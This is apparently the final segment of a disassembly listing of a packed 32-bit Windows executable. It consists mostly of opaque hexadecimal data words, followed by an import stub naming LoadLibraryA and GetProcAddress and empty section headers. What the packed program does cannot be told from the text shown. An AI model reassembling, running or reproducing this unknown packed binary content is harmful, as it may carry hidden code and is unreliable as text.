dd 0D4C627Ah, 9FF45DA9h, 55AEA318h, 505228F0h, 38516529h
dd 27AFB388h, 8A0E18Eh, 5E813E68h, 698320E8h, 5C71A3Fh
dd 0F1317FA6h, 27786AE3h, 2E134874h, 0B50EEA7Eh, 0A9B5C7C3h
dd 52668B1Bh, 0C4D1BF29h, 9E05A25h, 8C60E8F0h, 758AFEFBh
dd 0DF49231Fh, 0EB67503h, 47BF4E7Bh, 587AA5D8h, 2F5CA4Bh
dd 4B5636AFh, 4C27EA1Fh, 757D6E36h, 0F5AC8866h, 7E01AF80h
dd 4D392500h, 33207C10h, 8E6C1D2h, 6AC2950Fh, 400D5F14h
dd 919F09E7h, 0BC4DF0AAh, 0CA885DA2h, 82333B4Ah, 5E382072h
dd 8A1BF561h, 10808BCFh, 6512E62Ch, 8C98E352h, 195961E9h
dd 6A828AE8h, 8D696D74h, 3A464D6Fh, 5D95043Fh, 6A50916Ah
dd 6E234CB7h, 250E084Bh, 6ABAEB07h, 0E899F409h, 0DAE80404h
dd 7FD9B6FEh, 0AE916F98h, 959EEB0Dh, 806F9229h, 0D993AC84h
dd 5F03EC8Eh, 3B4170EDh, 1CD73D5Bh, 0C4C05784h, 0B702E6C1h
dd 0A9600592h, 74261839h, 1826EC44h, 0D5830C09h, 4CEB040h
dd 4B6E5981h, 0ACF603E7h, 7C148ABBh, 92A42728h, 0FDB30616h
dd 122F8A7Fh, 0E8063461h, 59CD5288h, 1C890EA3h, 0EE5B47F3h
dd 0A71177DFh, 4F85449Eh, 53E59245h, 0F94E0569h, 0AB248E0h
dd 0A103E180h, 48F9A63Ah, 0A9663F02h, 39324108h, 94502ABBh
dd 0C02B5D3Eh, 662C7E1Eh, 39752C3Dh, 98D6368h, 0C6E578h
dd 0F75C718h, 77C0846Fh, 31EB9879h, 0EB1489FDh, 3AF23B07h
dd 3715CB2Eh, 0E866B573h, 5E061E90h, 50ACC397h, 9C0975A1h
dd 0E42D3384h, 1212D641h, 0CBE0FCEEh, 77D51A05h, 40831AEBh
dd 303614EBh, 52C4C73Bh, 9F71EF5Bh, 1EDEA2EAh, 1EAF0934h
dd 12E791D5h, 28EA9DA8h, 0C1A9DC62h, 16A40966h, 0FBF617A2h
dd 61F28556h, 858D0F12h, 0A00B679Ah, 3839B004h, 455E7424h
dd 0C05C56E5h, 9871E7D1h, 0B4C1B538h, 254027FCh, 0CA9DEB0h
dd 2F3EC1F6h, 1855392Eh, 6A00892Fh, 1E69999Eh, 3919EB10h
dd 142C7D66h, 84024840h, 6B1B358Ah, 45092B01h, 0E8ED8CDCh
dd 2746D508h, 0C22484EBh, 0B07D9CE0h, 644FCAC8h, 2D758AC3h
dd 92E6D112h, 0BD795401h, 0E8DC0A60h, 7E939D29h, 4C90D108h
dd 9FF1F13h, 0FAA50069h, 0B08A0D2h, 38B8055h, 74C91BC1h
dd 0E959130Bh, 72D6844Ah, 45140716h, 63CD6B34h, 6A854B63h
dd 68C78806h, 249D10FEh, 63FD080Dh, 0A02E1F48h, 426DCA28h
dd 1F830AEBh, 0EBFE55E8h, 44621BBEh, 3452167Fh, 46BE9247h
dd 12184D1Fh, 6714D840h, 0DED00E53h, 12D55609h, 0A7FA7576h
dd 4DF80CFEh, 65B9CC4Dh, 4D82D406h, 9F91775Fh, 1EFC1480h
dd 0D62C9659h, 251D9680h, 0F97C101Ah, 58D1B04Eh, 77BCB483h
dd 4B743398h, 7F4513A9h, 0C8EC7184h, 0DCD42450h, 0F0373779h
dd 8E98E8D8h, 5980E096h, 7EF73B46h, 0FE81255Bh, 5340AE64h
dd 2F388E36h, 0FFFE9CE8h, 74C71162h, 572DC738h, 0D2DC701Ch
dd 2E85A577h, 0F22BFDB1h, 162F494Ah, 72A2D1E9h, 697A3F10h
dd 6481D35Ch, 3D0C52E4h, 4C740639h, 36251ED8h, 0E607DEAh
dd 0ECB57EE0h, 4F18D0CCh, 7FAD41F4h, 68CC5D8Bh, 691D28F7h
dd 22531C28h, 460C13C9h, 603FCB3Dh, 0EBE0C101h, 0D49C945Bh
dd 211241EFh, 47936929h, 9904326h, 2E563C74h, 8BD20AE2h
dd 7464E869h, 5047CA2Bh, 2E4F5325h, 0E8E0C941h, 4B157ED4h
dd 885FEB52h, 17268594h, 0D07E7C28h, 129F0152h, 0DAF2E965h
dd 528DE01Eh, 84CDB2C0h, 0BA247D92h, 2A030023h, 75F06807h
dd 0E41C2740h, 0E82036DAh, 49A34AD0h, 3A6EC3D7h, 22BA564Bh
dd 0AB5574D5h, 8E6EDE2Ch, 1994A1D6h, 5EA21290h, 0DBAA05EEh
dd 46A0BE6Ah, 7D79E81Ch, 620B5B97h, 0B188C65h, 42EB0BC3h
dd 4F2446F6h, 0B4E9C737h, 836E1AFBh, 620351B9h, 0E4821C40h
dd 7827B9C4h, 0C3D35602h, 9513057Dh, 91BB11EBh, 9A0A74ACh
dd 7A1F432h, 6EC7EE0h, 0E5F1B70Ch, 0E8C4A425h, 0D6D2D522h
dd 787A4D6Bh, 21754212h, 7C284FF7h, 858BE3F0h, 4A830C95h
dd 4C054AB1h, 99D8CF91h, 37810514h, 9F0DD9E3h, 36EF2F14h
dd 0EB0544C1h, 36BFD56Ch, 75E3587Ch, 0CF6810C7h, 52D4F97Bh
dd 138F45ADh, 0AE7C87A4h, 84AA3D3Ch, 54D08997h, 711A5134h
dd 3B211D6Eh, 0AC5267CCh, 0D0EB2591h, 3C913671h, 0E240FE2h
dd 4B02C632h, 0A5EF51F7h, 65A0572h, 0E931810Bh, 2BF2C568h
dd 9878BC85h, 0EE950B9Dh, 10A5915Ch, 1981735Dh, 0A2E9BB46h
dd 7BEFC3F4h, 9F7B525Ch, 0B84AACD2h, 169847D4h, 0B1F6F781h
dd 53306648h, 0C90B1072h, 20957475h, 0B70C7DDAh, 5AB30941h
dd 0F85220B6h, 0E40A261Dh, 27740704h, 2322EAA8h, 3A0760B5h
dd 6723AE7h, 277E30Eh, 725FE62Fh, 0C627C315h, 9105E0A5h
dd 0AA80E983h, 0D3C933D1h, 0B9440D16h, 272CCDBh, 8BD9F701h
dd 5F5E5BC1h, 0C609663Ah, 0C48ACB98h, 5885C47Dh, 487CCF4Dh
dd 758201A1h, 9B43F606h, 0FE267BDEh, 16344702h, 16E00BBBh
dd 0D92056D8h, 8BECEFF5h, 0F39F98F8h, 74190B66h, 0F2C47A1Ch
dd 0D046014Ch, 0C6270A23h, 253CC850h, 0C7F059A7h, 7F4CEB85h
dd 44C6590Fh, 0FE245C30h, 0FB0D1224h, 1025817Ah, 48A5CD3Eh
dd 218428D6h, 1B669783h, 337A5BC8h, 3CC4A992h, 0A28E4BE9h
dd 7A9BB11Bh, 1EEF810Ch, 0EB896D10h, 0FFF5660Eh, 0A0EA231h
dd 0FED30990h, 0FEB8CB0h, 7A4926F6h, 4712E8C2h, 0F5BF1297h
dd 0FFA493B8h, 6BC3C294h, 899FA71Eh, 6065DA1Ah, 668183B0h
dd 59B5F70Ch, 6AA3211h, 28DAE3FFh, 0FEF90406h, 7F7C5D25h
dd 0FBAB0143h, 40EE0983h, 91EDF581h, 0CB22E308h, 89A7BB44h
dd 24831295h, 915D486Dh, 44332245h, 0FD880D23h, 12EB81ECh
dd 892926DDh, 110AE99Dh, 91D1999h, 2443122Dh, 91654853h
dd 4489227Dh, 0B389A397h, 90F2DD11h, 0BF33EB89h, 922A911h
dd 77894499h, 55126589h, 33484524h, 0CF51E199h, 22C10991h
dd 879744ADh, 61127989h, 41484D24h, 21222F91h, 40FD1344h
dd 0D789EDEAh, 0CF26CD12h, 11C56491h, 68114A1Dh, 8364B422h
dd 0A1488F09h, 0C722B591h, 89E9D744h, 0EF0F11FBh, 49242B02h
dd 75915D48h, 0A5448D22h, 12C389B3h, 48DF24D1h, 10F991EDh
dd 1722F009h, 89312344h, 2453123Bh, 91794863h, 44AB2291h
dd 0E389D7BBh, 0F924EF12h, 79F10546h, 913109C8h, 44632249h
dd 0A5899379h, 0CD24B312h, 0EF91DD48h, 782AFF21h, 9F805549h
dd 0D04C72D2h, 89130910h, 240F1202h, 0CE89C12h, 910909C8h
dd 446E2203h, 1891408h, 96241112h, 33910A48h, 58821622h
dd 0D108284Dh, 75120860h, 8862A08h, 2E089B3Ch, 8B7B0BA5h
dd 0D4897CE5h, 0A50825C1h, 43B08CF2h, 4507726Fh, 50746978h
dd 6563036Fh, 75208E73h, 24BDF16Dh, 642E1C7Bh, 778786Ch
dd 69746E75h, 0FF20D76Dh, 6CE73C3Bh, 81A80D38h, 4F384C54h
dd 4112D253h, 49E8C30Fh, 0B887474Eh, 4D4F4406h, 12852641h
dd 30365201h, 12813433h, 61206E41h, 696CC470h, 0A4CC6376h
dd 0FA68186Fh, 0F66DE873h, 0F3B6DF64h, 8F8F7431h, 0FBBE708Eh
dd 6C396FBFh, 681028ECh, 0D5432ECFh, 6266997Ch, 79F561EDh
dd 98FAE7E3h, 74EA99A0h, 2E1D6C7Ch, 0ED7C500Ah, 24B73882h
dd 14248D48h, 275E2C32h, 759BB8DCh, 355E6C1Eh, 66FA6D50h
dd 5BB5BDABh, 177A89D5h, 592E24A9h, 0C6A019AEh, 41202D01h
dd 7532874Eh, 0D9864DB9h, 0A389C34Ch, 6DCA4366h, 0AC69C736h
dd 0D432DEE8h, 197E8162h
dd 98727564h, 979EDF67h, 26657629h, 1ABC2037h, 7A83A161h
dd 54510A0Ch, 64289430h, 75658D93h, 6F7562F0h, 79262167h
dd 0AC8D766Fh, 495B2E1Fh, 0A05741E6h, 0EC46FDD3h, 86BC656Bh
dd 0FAE82CFh, 6F24F8C3h, 0AABCDB66h, 0FA6D1DCDh, 2D209453h
dd 2169A681h, 28284100h, 72B9EF2Fh, 1E9F4529h, 68542429h
dd 396165A8h, 0A451E795h, 0FD36A245h, 8C1D06D0h, 644D9444h
dd 8A2E9861h, 0F8322998h, 0CE6FB33Fh, 9F0A4065h, 48369068h
dd 917B4E70h, 0D589A82Fh, 68B531EFh, 0A18F3130h, 986564FCh
dd 544952BDh, 2D1A9A70h, 0A89276B5h, 90103B2Eh, 4D28A79Ch
dd 0AA00D95h, 20642961h, 48383288h, 0A6112FBh, 0FA83658Fh
dd 0A3A0820Dh, 328AAC3Ah, 6ADEE437h, 0FAB8E277h, 1AE73814h
dd 642B57D4h, 8355938h, 0FE755470h, 81694C76h, 0A144D478h
dd 52CA26E5h, 34532886h, 795FF360h, 6892B256h, 2007B22Fh
dd 8EE384DDh, 39312B60h, 704DCEF8h, 0EFEC4D80h, 6F872148h
dd 0B22C94E8h, 8E683338h, 243B824Ah, 0B4691A64h, 372481ACh
dd 776D261Fh, 8768ECB2h, 91C961C0h, 305E6B06h, 37E41856h
dd 3BB82A35h, 64725F6Eh, 98F5CAF3h, 0E7757146h, 0E7D24DDFh
dd 0E53A528Bh, 2126C92Dh, 5FF5EF69h, 12D262F4h, 983AEF26h
dd 7C41A489h, 77F3B177h, 39E2C4A2h, 56226D8Dh, 938356B6h
dd 2C5CCC68h, 0E3AD3891h, 0A75F59Fh, 0E4587329h, 0E9662232h
dd 0B16274C5h, 0CBC8E41h, 43D097D2h, 0D9643564h, 4D0294C2h
dd 0B6D26ABAh, 562C6619h, 43E698EAh, 1022E32Bh, 0F5B24CCBh
dd 5D0A2806h, 6022E6Eh, 735E703Ch, 6EDBA967h, 504366D3h
dd 777BA26Bh, 33F03E68h, 0A78845C4h, 505CCA21h, 203A4327h
dd 0C6A9795Fh, 2E09F832h, 9C785A41h, 450B74DCh, 50AB916Eh
dd 5ADA9849h, 454B0E8Ch, 4C6B4E52h, 442E0783h, 0BC4469AFh
dd 83206556h, 9C736C46h, 8030CB1h, 5674B953h, 0A475A542h
dd 413C470Ch, 22535FFh, 0B658283Ch, 9CFD7570h, 102A2905h
dd 3665FBFFh, 3090617h, 3F86901h, 2BB10BEh, 2450499h, 70350805h
dd 29505430h, 1C387820h, 12080758h, 57400F37h, 0FE20373Eh
dd 0EA17283Fh, 0DA687260h, 99431203h, 0B8FF0396h, 0FE3C6E45h
dd 5CD0F37h, 49050F07h, 431AF58Bh, 606A1572h, 6B99A709h
dd 0E9697141h, 43C64370h, 511D96D4h, 0F3CE6B51h, 0E8896C9Ah
dd 186D544h, 3020103h, 60504h, 0B0A098Eh, 0F0E0D0Ch, 12111000h
dd 16151413h, 19180017h, 1D1C1B1Ah, 20001F1Eh, 24232221h
dd 272625h, 2B2A2928h, 2F2E2D2Ch, 3200F998h, 36353433h
dd 393837h, 3D3C3B3Ah, 41403F3Eh, 44434200h, 48474645h
dd 4B4A0049h, 4F4E4D4Ch, 52125150h, 0FA5453h, 5A595880h
dd 5D0B5C5Bh, 4605F5Eh, 4B8263A1h, 69316066h, 6C6B126Ah
dd 70AC026Dh, 0F6607271h, 77007675h, 7B7A7978h, 707E7D7Ch
dd 9645907Fh, 0A157E474h, 53CC4317h, 2A5CDFCh, 0E8605518h
dd 622A4F72h, 494CCB6Ah, 10BEE5BEh, 4C3E1C20h, 63698EEFh
dd 0A450E249h, 14225BA8h, 47841084h, 0A5C75890h, 42E76761h
dd 246478B6h, 29E15355h, 800643DEh, 819B868Bh, 38993ACh
dd 827E107Ah, 54821448h, 2DE858Ah, 7A1F2635h, 889250DCh
dd 27285644h, 24578C83h, 4F8D0748h, 0E788983Eh, 32DC2820h
dd 2E096DB7h, 84025A8Fh, 9087077Fh, 0AD067716h, 5501A188h
dd 25F2071h, 0D06F2821h, 234838AFh, 0B84D910h, 81A222D1h
dd 1420296h, 29400EFDh, 2640282h, 893CD12Fh, 0DD029520h
dd 8AEA6891h, 17520201h, 236C901h, 21024AFFh, 2917E02h
dd 2AFF02C8h, 0E4028F00h, 0E70E5014h, 4E0179C8h, 3078F401h
dd 0DB02A702h, 93128047h, 0D327BAh, 83828180h, 86858400h
dd 8A898887h, 8D8C008Bh, 91908F8Eh, 94009392h, 98979695h
dd 9B9A99h, 9F9E9D9Ch, 0A3A2A1A0h, 0A6A5A400h, 0AAA9A8A7h
dd 0ADAC00ABh, 0B1B0AFAEh, 0B400B3B2h, 0B8B7B6B5h, 0BBBAB9h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C6C5C400h, 0CAC9C8C7h, 0CDCC00CBh
dd 0D1D0CFCEh, 0D400D3D2h, 0D8D7D6D5h, 0DBDAD9h, 0DFDEDDDCh
dd 0E3E2E1E0h, 0E6E5E400h, 0EAE9E8E7h, 0EDEC00EBh, 0F1F0EFEEh
dd 0F400F3F2h, 0F8F7F6F5h, 9FBFAF9h, 0FFFEFDFCh, 9454D965h
dd 0D994D6B9h, 5500295Dh, 5AD5804Ah, 35FA5973h, 57802920h
dd 3A134867h, 7A398F6Dh, 6402C84Ah, 4D202C84h, 6E09685Dh
dd 18190379h, 763F072Fh, 0FB50DCC8h, 95A4103h, 58B17812h
dd 59C7368h, 72766F4Eh, 0BE564F0Ch, 537F0B20h, 15AC7079h
dd 6775411Ch, 0D5837396h, 0AC6CC24Ah, 426E1044h, 70410265h
dd 236C6972h, 63C1614Dh, 65461068h, 0BC75F262h, 854AC744h
dd 0D10B5A6Eh, 20586008h, 84C8254h, 71324448h, 40448879h
dd 34833C20h, 0DA98487Ch, 53F364FCh, 0BE444644h, 6865540Ah
dd 14317326h, 43E76557h, 54140DFAh, 4D820A75h, 11A26E6Fh
dd 89B7553h, 43C8841h, 28301038h, 41A22441h, 2517DB04h
dd 4F41336Dh, 22B05DA3h, 288A8A83h, 9FA29891h, 0AD28A68Ah
dd 8ABBA2B4h, 3FC913C2h, 0E47C4303h, 24543855h, 47483842h
dd 5A912FB9h, 76DAE470h, 4650427Ch, 27EC802h, 2C9DAC34h
dd 81F4C0Ah, 10FA9C45h, 0B44A0836h, 2E67242Ah, 84D2D78h
dd 8021019h, 10303AD4h, 20AF3B0Eh, 3C40B042h, 0A7C4D047h
dd 87807844h, 38CE2BA8h, 99219D66h, 0A13C1128h, 18F86818h
dd 0C288AF51h, 473C6468h, 6609C5D8h, 0F9155C28h, 7785685Ah
dd 19486A75h, 1D387709h, 1120B5D2h, 0E55F235Bh, 0AC606CC0h
dd 0CC887A47h, 817BA278h, 0E8BFD2B9h, 4082310Ah, 0F10880D4h
dd 4240AF85h, 433C8942h, 9270C68Ch, 0AD747438h, 9AA94340h
dd 57C5383Ah, 9DDAE180h, 7CE11037h, 85205EA4h, 0C07EA9F7h
dd 40B77B15h, 0B847E0E8h, 1FBB41E1h, 7EBDF385h, 0BF7116E0h
dd 3DCF8CA2h, 15486E93h, 0E868C2E4h, 20C357C6h, 4C588A1h
dd 0C2F6F0FBh, 0CCD402B7h, 117B0FD1h, 46202186h, 6CC444EEh
dd 16884EF1h, 0F02EE8A8h, 0B7EA6C17h, 0B0B4FA74h, 116480BDh
dd 3481409h, 13221091h, 890D0144h, 2404120Ah, 9109486Fh
dd 44022215h, 0B899712h, 17243412h, 53835250h, 708B656Ch
dd 0A581114Bh, 63ED7845h, 4DCC302Fh, 7565646Fh, 0CDAC4630h
dd 0D4614E27h, 93D22C41h, 0FE7443E0h, 4A939F54h, 43262185h
dd 1C27F775h, 512D4E6Eh, 696E1749h, 6C689EB1h, 480D7ABCh
dd 90646E61h, 1E0D421Dh, 70EC5409h, 0ED65A379h, 0F5441E73h
dd 6F3E49BDh, 5720792Ah, 18466453h, 686DBE9Fh, 0C3A1958h
dd 323F3352h, 2278A74Eh, 866157A4h, 4F564684h, 42EA8653h
dd 27AE9B97h, 0C6EE542Dh, 2D389F87h, 14A3424Fh, 0D6488E0Fh
dd 3C39C4B2h, 6CE26FF4h, 70E46866h, 80536E32h, 0EA7F73CFh
dd 65521E1Ch, 0B076556Dh, 0EB8272F6h, 1274F41Ah, 4AFD765Ah
dd 6EB1E830h, 3EF7FFDDh, 1D417562h, 0AB70932h, 141041CCh
dd 1311647Fh, 2B40A338h, 4C456C73h, 894F08BDh, 3B0C0D04h
dd 3CEBF029h, 59C8727Ch, 71566E24h, 78E1924Dh, 920D5229h
dd 0F9A9E157h, 6CAECF66h, 53571E30h, 8AE25F53h, 6729E0D0h
dd 144B9ECBh, 0E7930E79h, 41E35068h, 3FA420A6h, 8D113FD0h
dd 9A063451h, 546BE948h, 6E1DD8E8h, 4167C966h, 1786AA16h
dd 0CCA3F2A6h, 116CFE29h, 0F6E244Dh, 39F5678Ah, 369C34F5h
dd 4C912016h, 16691148h, 37268453h, 2C204D43h, 98A57288h
dd 0AD217521h, 90124194h, 0A4BED19Dh, 7239D4ECh, 86D05FD2h
dd 409132BCh, 46D388C8h, 896F3818h, 33737565h, 4ECE6974h
dd 40407256h, 0A3AC6CE3h, 41C185BDh, 1D036E6Dh, 705C3744h
dd 2768C578h, 56AE2FB3h, 8E4950A4h, 0AD7E4C78h, 53504311h
dd 0D4C4BADh, 2CC5485Bh, 0C04ED29h, 713E059Dh, 0C76441B8h
dd 0D3732238h, 928ED14Ch, 0E0035029h, 4C238E6Dh, 9F7C574Ch
dd 4256BCB1h, 0CA7E738Ah, 4829D734h, 865E89A0h, 7EC38634h
dd 0F7A59F75h, 99FE8E41h, 68F55529h, 8E3D6757h, 0A5702496h
dd 55C3151Ah, 1FD13616h, 0DC9849ACh, 76157BF1h, 0BB502AC3h
dd 3A2DABD2h, 943E796Ah, 29944C31h, 0D65A1776h, 2B993442h
dd 46562F18h, 8625AEECh, 682C990Eh, 2BBE4AE2h, 35F04D4Eh
dd 4D79F93Fh, 5E00260Eh, 0B3B65226h, 44102973h, 2D86CE64h
dd 357AC754h, 0E67CAC1Dh, 1A535319h, 49CA88D1h, 6B494CAEh
dd 16DD0F90h, 0AEB928B5h, 36582857h, 73685DA9h, 46655C7Ah
dd 30448F3Eh, 799822F4h, 546D8968h, 417887B7h, 154DAE9Ah
dd 786B2266h, 411CBB73h, 0ECA0CD2Dh, 0F6F15239h, 0F277AC41h
dd 50E48008h, 0C08F589h, 681AD041h, 4D454FC2h, 0BC880C92h
dd 166997DEh, 0E59FE5F7h, 226C4467h, 0AEF445E3h, 0F1755359h
dd 9B735C30h, 5219A136h, 5791321Fh, 65B4CB74h, 54729C20h
dd 0A3BD4D6Fh, 0A77942FEh, 497C48FAh, 97D54057h, 5C61E296h
dd 7954E078h, 0A672F370h, 642D5088h, 1379A2BDh, 281E4227h
dd 52442C51h, 32533872h, 6C5A73DEh, 0CF92BD3Ah, 0D210FA08h
dd 32934EE6h, 54115312h, 0D0B0420Ch, 92C542BBh, 247F1699h
dd 7049CAC1h, 70BE74FFh, 108FC3ACh, 7C2D5716h, 0C2220E04h
dd 8512BE41h, 0DA9024F6h, 9C8EAC46h, 0C7AA4156h, 70A6754Fh
dd 3CC08206h, 0EC72F926h, 488A8AD2h, 687314B3h, 38423C0Dh
dd 701FDD66h, 7FD501ADh, 766E4984h, 0E04EFAADh, 744A73C9h
dd 5EFB4CD4h, 95CBA5CDh, 0F9D38F6h, 5BE8B398h, 637553C2h
dd 7D522074h, 0E55C1B3Ah, 767BFA3Ah, 639B14A7h, 0AAFCE458h
dd 0C9971446h, 0A551992h, 0E6CA7718h, 0DEE6B64h, 893FF050h
dd 0FA2AA7A9h, 367C871Fh, 2CCA5012h, 71A75467h, 683A3896h
dd 1E32ACD0h, 0E2E3833h, 362E356Ch, 926DE8D9h, 0E9E02539h
dd 1C747168h, 722F3A70h, 3B22E19h, 48380C1Eh, 2F508F54h
dd 2030A331h, 946E9F32h, 9D0DACB5h, 7978DCE8h, 0C72D4Bh
dd 543AABFFh, 0D32C220Dh, 0D050BC2Ch, 5208B63Ch, 9E423243h
dd 9169C64Bh, 0E568B981h, 0DF415B64h, 54C2595Fh, 745C4D45h
dd 42F1C908h, 0F35C494Fh, 12731A52h, 8A325D56h, 0FA694641h
dd 0B118D350h, 0B41A2B36h, 3C4A7E16h, 0DBF077A7h, 5060506Ch
dd 0A74ED579h, 3C3C6437h, 809566D9h, 75415CD9h, 0FF109074h
dd 77A77AE9h, 6C6CB0D1h, 346AF54Ch, 82CFAFEh, 29523A28h
dd 0F385995Ah, 3F97B41h, 44C96CF8h, 0A568BD65h, 0DC81EB79h
dd 699880FDh, 3A397325h, 2045242Ah, 1AAD6467h, 0C5C219Ah
dd 0EA12182Fh, 0E4102850h, 0C35262BCh, 0C65CFF78h, 0F578F02Eh
dd 85159BC2h, 399B6E2Bh, 0A1647220h, 38BB6DF9h, 0F6591BD1h
dd 3ED89D3Eh, 344FACDh, 0F0F92B87h, 90797CBCh, 0CD77FC78h
dd 0D1C6B26h, 0CCE4BD54h, 5A146D9Eh, 5913D63Eh, 73482B90h
dd 681B9B90h, 0EF98AC6Dh, 6C3893B4h, 7BF5B7DAh, 61A2BDD3h
dd 628DF549h, 0B226E336h, 4443842Eh, 4143804Dh, 61531449h
dd 550FC466h, 0DC7D786Dh, 77082867h, 9AB09D41h, 4628504Bh
dd 571B0834h, 52FC6265h, 0E89099FEh, 75E9528Fh, 418062F1h
dd 77464756h, 0CEAD153h, 37673A76h, 3C556C3Eh, 10B4522Eh
dd 4CA334B7h, 507885ADh, 3A61197h, 66704D16h, 899D54B2h
dd 0C8D96D73h, 4DE84E19h, 4866FCA7h, 453D1B90h, 6753FE76h
dd 0DA6D480Ch, 0D1464311h, 76D16477h, 0CB646BE6h, 0AD438A42h
dd 7746020Ah, 6E0880BEh, 0E61ED06Ch, 2D0C6D29h, 9025362h
dd 0F7A96956h, 5FCDD9F6h, 0C357F80Ch, 6C435F0Bh, 22ED6A71h
dd 1C2156D8h, 700E3233h, 0D436D264h, 0A0048F49h, 0A37ABD01h
dd 0BF19B11Fh, 16190199h, 0CA020991h, 4640803h, 5911848h
dd 6440D22h, 12078909h, 7208240Ch, 4C0A3909h, 94870B1Ch
dd 8D03C16h, 94580F29h, 11C81410h, 0D0041294h, 94212318h
dd 41C81035h, 507243E4h, 4C523499h, 8A65318h, 29605753h
dd 6C947C59h, 916DC818h, 44702220h, 0ACAE721Ch, 2B300653h
dd 8194B480h, 2082CA08h, 84728364h, 12914899h, 329E2529h
dd 90B9A110h, 0A7704CA4h, 0A0B7578Eh, 9120CE29h, 2418C9D7h
dd 348F0C15h, 0D0160146h, 0B274F944h, 71E45102h, 43085B01h
dd 200FF918h, 43FE3090h, 17EE420h, 384710E2h, 40D7A884h
dd 0D47C5C8Ch, 50CDC410h, 0B8D44C10h, 28A9D678h, 9C10A98Ch
dd 46105C9Ah, 11386470h, 910C4813h, 0D5D41018h, 0AC441922h
dd 1274891Ah, 483C241Bh, 2214911Ch, 0D4F4201Eh, 89901F44h
dd 24581220h, 0D3604421h, 0C0882208h, 227811D2h, 0A07944B0h
dd 90127A89h, 8C48FC24h, 7C21FF91h, 0B88C0121h, 0C4A818D8h
dd 2FAA0809h, 0BCF058Ch, 1D64FCAEh, 96720419h, 88D441Eh
dd 0C88E438Eh, 0F90798Fh, 92E49121h, 9687933Ch, 78E07203h
dd 0DEA730CEh, 0EE0187FEh, 0D620C810h, 4EBB1AE1h, 24B44DF6h
dd 0ED6BEB20h, 0ADE26B5Ah, 0A4AA0422h, 4ABE0B9Ah, 1A503EAh
dd 0A4B20402h, 826041E8h, 21537972h, 0DFA61418h, 0A5A18408h
dd 0E09F8160h, 4008FC42h, 0A866807Eh, 0A3C11C61h, 0D4CDA4DAh
dd 14FE8123h, 0B5CA0840h, 41915D30h, 0CF87B6C8h, 1A27E4A2h
dd 0E867E507h, 406B5B84h, 0AA8A190h, 9C70551h, 0C02C5EDAh
dd 0F06AEC5Fh, 0D3C08532h, 40E0DED8h, 7E5231F9h, 0DDAC133Ah
dd 43C9BCA8h, 14FC3CC7h, 10410DA8h, 0AC01CABBh, 1248295Eh
dd 0DBA84224h, 0E030D883h, 0E1B00810h, 621EEB4Ah, 302A0D1Dh
dd 0EC880882h, 0DC525228h, 297B804Bh, 412A6082h, 0C60108B9h
dd 7B72F971h, 0F460CA3Ch, 603E025Ah, 0B8AF0142h, 4A1EE103h
dd 6D1A13EAh, 0AA083438h, 40D8DD40h, 9C8D4E3h, 22CC91D0h
dd 0C0C444C8h, 0B012B889h, 9C48A824h, 88229091h, 89787C44h
dd 24701274h, 9168486Ch, 44602264h, 5489585Ch, 4C245012h
dd 38914448h, 28533022h, 44202230h, 4891018h, 3E2FC11h
dd 0E40922F0h, 89DCE044h, 24BC12D0h, 40945B0h, 0BC4C288Eh
dd 443CB492h, 7429DCB2h, 5354041Dh, 0C58017Fh, 2E8BF04Dh
dd 247743Eh, 217080C5h, 3EF1F020h, 245070CCh, 0FD905453h
dd 4044508Ah, 0B8B015FDh, 8909F035h, 91A46698h, 0BAFE880Ch
dd 0B494655Eh, 9C83BECh, 2278915Ah, 0D4B54497h, 1112F389h
dd 930D9A6h, 8A6D4E44h, 123A3431h, 48772459h, 22B49196h
dd 10F244D3h, 4D122F89h, 14CE6C27h, 0FFAFFA01h, 60h, 1CFD8h
dd 2 dup(0)
dd 1F2h, 1CFD8h, 5 dup(0)
dd offset loc_401000
dd offset dword_415000
dd offset off_40E844
align 8
dd offset off_41CFC8
dd 80h, 7D00h, 12FFC4h
off_41CFC8 dd offset dword_400160+88h ; DATA XREF: seg002:0041CFB8�o
dd offset dword_400160+7Ch
dd offset dword_400160+7Eh
dd offset loc_404D7B
dd 77E805D8h, 77E7A5FDh, 0
aLoadlibrarya db 'LoadLibraryA',0
align 2
aGetprocaddre_0 db 'GetProcAddress',0
align 1000h
seg002 ends
; Section 3. (virtual address 0001E000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0001E000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 41E000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start